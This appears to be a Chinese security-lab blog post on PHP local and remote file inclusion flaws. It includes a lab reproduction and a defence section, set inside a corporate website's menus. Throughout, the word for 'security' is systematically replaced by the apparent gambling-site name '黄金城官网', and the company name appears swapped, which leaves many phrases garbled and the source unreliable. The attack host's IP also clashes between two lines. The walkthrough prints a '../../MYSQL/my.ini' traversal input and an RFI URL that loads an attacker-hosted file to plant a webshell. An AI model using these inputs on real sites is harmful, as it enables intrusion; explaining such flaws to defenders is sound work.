黄金城官网实验室 | PHP文件包含漏洞原理分析-





首页 产品与服务 解决方案 客户案例 技术支持 合作发展 关于黄金城 用户退出 合作商登录 用户登录 申请试用

数据黄金城官网


数据库保险箱数据黄金城官网分类分级平台数据黄金城官网综合评估系统新一代数据黄金城官网一体化平台
存储域
数据库加密诺亚防勒索
访问域
数据库防水坝数据库防火墙数据库黄金城官网审计动态脱敏
流动域
静态脱敏数据水印 API审计 API防控医疗防统方
运行黄金城官网


新一代灾备一体化平台灾备一键通数据库运行黄金城官网管理平台
数据流动


数据流动平台静态脱敏数据水印
黄金城官网运维服务



运维服务
数据库运维服务中间件运维服务国产信创改造服务驻场运维服务供数服务
黄金城官网咨询服务
数据出境黄金城官网治理服务数据黄金城官网能力评估认证服务数据黄金城官网风险评估服务数据黄金城官网治理咨询服务数据分类分级咨询服务个人信息风险评估服务数据黄金城官网检查服务

行业解决方案政府解决方案金融解决方案医疗解决方案教育解决方案能源解决方案物流交通解决方案

售后服务文档中心年度培训

渠道政策申请成为合作伙伴渠道专区

公司动态行业资讯黄金城官网研究

热门阅读

用AI重新定义数据黄金城官网监测，让数据黄金城官网变简单

2026-03-17

金融机构数据黄金城官网能力体系建设与落地实践

2026-02-27

开工大吉｜策马扬鞭，跃启新程！

2026-02-25

浙江省委宣传部副部长、省委网信办主任赵磊：守正创新辩证施策全力推动网络生态治理工作迈上新台阶

2026-02-10

黄金城产品全面入围中直机关2025年网络设备框架协议采购项目

2026-02-04

相关文章

每周黄金城官网速递??? | 密西西比大学医学中心在遭受勒索软件攻击后恢复正常运营

2026-03-09

每周黄金城官网速递??? | LockBit5.0版本支持Windows、Linux与ESXi平台

2026-03-09

每周黄金城官网速递??? | Osiris勒索软件利用BYOVD技术禁用黄金城官网工具

2026-02-02

每周黄金城官网速递??? | DeadLock勒索软件团伙利用Polygon智能合约存储代理服务器地址

2026-01-19

每周黄金城官网速递??? | 勒索软件攻击导致心理健康机构超11万人数据泄露

2026-01-06

黄金城官网实验室 | PHP文件包含漏洞原理分析

发布时间：2020-08-14 阅读次数： 327 次

PHP是目前非常流行的Web开发语言，但是在利用PHP开发Web应用时，如果稍有不注意，就会产生PHP文件包含漏洞。PHP文件包含漏洞是一种常见的漏洞，而通过PHP文件包含漏洞入侵网站，甚至拿到网站的WebShell的案例也是不胜枚举。本期黄金城黄金城官网实验室将带大家了解PHP文件包含漏洞的产生原因和漏洞原理。

漏洞简介

文件包含漏洞（File Inclusion）是一种常见的依赖于脚本运行从而影响Web应用的漏洞。严格来说，文件包含漏洞是“代码注入”的一种，许多脚本语言，例如PHP、JSP、ASP、.NET等，都提供了一种包含文件的功能，这种功能允许开发者将可使用的脚本代码插入到单个文件中保存，在需要调用的时候可以直接通过载入文件的方式执行里面的代码，但是如果攻击者控制了可执行代码的路径，也就是文件位置时，攻击者可以修改指定路径，将其指向一个包含了恶意代码的恶意文件。

文件包含漏洞通常都会使Web服务器的文件被外界浏览导入信息泄露，执行的恶意脚本会导致网站被篡改，执行非法操作，攻击其他网站，获取WebShell等严重�：�。

漏洞产生原理

在上一节的描述中我们提到，攻击者通过控制可执行代码的路径就可以实现文件包含漏洞，这只是一个对整体攻击流程的简化描述，在实际情境下，服务器解析执行php文件时通过包含函数可以加载另一个文件中的php代码，当被包含的文件中存在木马时，就意味着木马程序会在服务器上加载执行。

所以产生文件包含漏洞的根本原因在于开发者是否对通过包含函数加载的文件进行了严格且合理的校验，在PHP中总共有四种文件包含函数：

1）Include（）：包含并运行指定的文件，只有在程序执行到include时才包含文件，且当包含文件发生错误时，程序警告，但会继续执行。

2）Require（）：只要程序一运行就会执行该包含文件函数，当包含文件发生错误时，程序直接终止执行。

3）Include_once（）：和include（）类似，不同之处在于include_once会检查这个文件是否已经被导入，如果已导入、下文便不会再导入。

4）Require_once（）：和require（）类似，不同处在于require_once也是与include_once一样只导入一次。

根据被包含文件的位置不同，PHP文件包含漏洞可以分为本地文件包含漏洞（Local File Inclusion，LFI），和远程文件包含漏洞（Remote File Inclusion，RFI）。顾名思义，所谓的本地文件包含漏洞指的是攻击者通过控制包含文件函数，如include（），require（）等，加载服务器本地上的PHP脚本文件，当然如果本地的PHP脚本文件都是一些对系统无害的功能性文件，攻击者也无法进行进一步的利用，但若是攻击者能够配合任意文件上传漏洞，将恶意文件上传进服务器中，再通过本地文件包含执行该恶意脚本就可以达到获得网站控制权的目的。

而远程文件包含漏洞是指攻击者可以通过文件包含函数加载其他服务器上的PHP文件，在实际项渗透目中，攻击者可以在自己的服务器上存放一个可执行的恶意文件，然后通过目标网站存在远程文件包含漏洞来加载相关文件，实现任意命令执行。

漏洞复现

01PHP本地文件包含漏洞获取服务器敏感信息

搭建测试环境，为了方便演示，我们简单设计了一个服务器上的PHP脚本代码，如下：

其中PHP配置文件中，allow_url_fopen和allow_url_include两个参数默认是ON的状态。（在本地文件包含漏洞中，allow_url_fopen必须是ON的状态allow_url_include的状态可以不用必须指定。）

通过访问该资源，可以判断使用了文件包含函数。

服务器直接将file参数当作文件包含的参数路径，并未做任何过滤，攻击者可以直接在file参数后面填写服务器敏感文件路径，从而获得服务器敏感信息，例如在file后加上../../MYSQL/my.ini即可读取到服务器本地的Mysql配置文件。

02PHP远程文件包含漏洞获得网站WebShell

同样还是采用相同的服务器代码，其中PHP配置文件中，allow_url_fopen和allow_url_include两个参数都必须是ON的状态。

目标服务器地址：192.168.20.35

攻击者远程服务器：192.168.210.102

在攻击者个人服务器上，放置了一个恶意文件（index.txt），如下：

该文件可以向目标服务器上创建一个hack.php脚本文件，并向其中写入一句话木马（已被Base64加密）,这里要注意的是恶意文件不能是php可解析的扩展名，也就是不能以php结尾。

攻击者通过远程文件包含漏洞，触发该文件（在file参数处写入http://192.168.210.35/index.txt即可），如下：

然后攻击者就可以通过连接工具，远程连接木马并获得网站WebShell

防御方案

01、设置白名单

代码在进行文件包含时，如果文件名可以确定，可以设置白名单对传入的参数进行比较。

02、过滤危险字符

由于Include/Require可以对PHP Wrapper形式的地址进行包含执行（需要配置php.ini），在Linux环境中可以通过”../../”的形式进行目录绕过，所以需要判断文件名称是否为合法的PHP文件。

03、设置文件目录

PHP配置文件中有open_basedir选项可以设置用户需要执行的文件目录，如果设置目录的话，PHP仅仅在该目录内搜索文件。

04、关闭危险配置

PHP配置中的allow_url_include选项如果打开，PHP会通过Include/Require进行远程文件包含，由于远程文件的不可信任性及不确定性，在开发中禁止打开此选项，PHP默认是关闭的。

05、提升黄金城官网开发意识

任意文件包含漏洞的主要出现在能够解析处理脚本文件的函数上，没有对输入的变量进行过滤，导致任意文件包含，进而导致恶意代码执行。在开发处理这类功能函数上，一定要遵循编程规范；在代码核心处，对变量进行过滤限制，设置文件路径或者白名单，避免执行任意文件包含。

上一条：《数据黄金城官网能力成熟度模型》实践指南：数据分级分类
下一条：每周黄金城官网速递???｜Avaddon利用网站发布泄露数据敲诈受害者

返回

快速入口

免费试用售后服务客户案例文档中心年度培训
热门产品

新一代灾备一体化平台数据流动平台数据库运行黄金城官网管理平台新一代数据黄金城官网一体化平台数据黄金城官网治理咨询服务数据分类分级咨询服务
解决方案

政府解决方案金融解决方案医疗解决方案教育解决方案能源解决方案物流交通解决方案
合作发展

渠道政策合作申请渠道专区
关于黄金城

关于我们大事记最新动态加入我们联系我们

关注或联系黄金城

官方订阅号

官方服务号

第59号

服务热线：400-811-3777

商务合作：marketing@mchz.com.cn

友情链接中央网信办公安部工信部 CNCERT 中国信通院中国软件测评中心国家工业信息黄金城官网发展研究中心赛迪研究院

Copyright ? 2024 杭州黄金城科技股份有限公司 All rights reserved.

浙公网安备 33010502006954号浙ICP备12021012号-1 网站地图网站声明及隐私保护政策

免费试用

服务热线

马上咨询

400-811-3777



【网站地图】【sitemap】